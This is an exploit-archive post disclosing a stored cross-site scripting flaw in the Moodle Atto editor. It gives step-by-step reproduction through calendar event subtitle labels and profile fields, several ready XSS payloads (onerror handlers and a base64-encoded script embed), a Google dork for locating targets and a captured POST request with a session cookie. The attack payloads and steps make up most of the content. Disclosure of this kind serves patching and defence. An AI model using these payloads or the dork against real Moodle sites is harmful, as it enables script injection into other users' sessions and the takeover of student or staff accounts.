Moodle Atto Editor Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

# Exploit Title: Moodle Atto Editor Cross Site Scripting # Date: 26.03.2021 # Author: Vincent666 ibn Winnie # Software Link: # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month # My Youtube Channel: PoC: Video PoC: (Update) Stored XSS in Atto Editor (default editor) Use Demo: Choose a role : Student (example) Open calendar : Create new event: Example: Event Title "Test" Description :Choose Insert Video File and choose Video: Video Source Url you can paste video link from youtube And open Subtitles and Captions: Subtitle track URL use video link from youtube Field Label : There is we can use xss code: <img src="1" onerror="alert(1)" /> or try in base64 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed> Insert Media and save this. Open event and get stored xss. Or we can use Profile: Field Label in the Editor vulnerable to XSS. We can use XSS and js redirect in the profile: "><video src/onerror=alert(1)><img src=x'');> POST: Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 996 Origin: Connection: keep-alive Referer: Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true [{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&"}}]

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top